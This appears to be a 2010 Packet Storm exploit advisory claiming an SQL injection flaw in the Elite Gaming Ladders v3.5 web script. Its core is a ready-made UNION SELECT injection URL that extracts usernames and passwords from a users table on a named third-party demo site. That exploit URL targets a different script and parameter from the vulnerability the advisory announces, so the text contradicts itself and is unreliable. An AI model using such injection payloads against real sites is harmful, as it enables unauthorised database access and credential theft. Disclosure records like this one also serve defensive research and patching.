Elite Gaming Ladders 3.5 SQL Injection

2010-06-19T00:00:00
ID PACKETSTORM:90804
Type packetstorm
Reporter ahwak2000
Modified 2010-06-19T00:00:00

Description

                                        
                                            `  
  
  
  
  
  
  
/*  
[-] Elite Gaming Ladders v3.5 SQL Injection Vulnerability [-]  
  
  
---Date : 2010-06-19  
---Author : ahwak2000  
---Email : z.u5[at]hotmail.com  
[-] Script Info [-]  
---Home : http://eliteladders.com/  
  
---Demo : http://eliteladders.com/demo/  
  
  
[-] Vulnerability [-]  
  
  
http://site.com/[path]/standings.php?ladder[id]=[SQL INj]  
  
  
  
  
  
  
  
  
  
[-] exploit [-]  
http://www.arcadecreate.com/demo/v3/snowcade/index.php?action=browse&cat=31%20UNION%20SELECT%201,CONCAT_WS%28CHAR%2832,58,32%29,username,password%29,3,4,5,6+from+users%20limit%201,1--  
  
[-] Greetz to [-]  
  
To All Friends in V4-team Forums And pc.pirate  
*/  
  
  
_________________________________________________________________  
Hotmail: بريد إلكتروني موثوق فيه ويتمتع بحماية Microsoft القوية من البريد العشوائي.  
https://signup.live.com/signup.aspx?id=60969  
  
`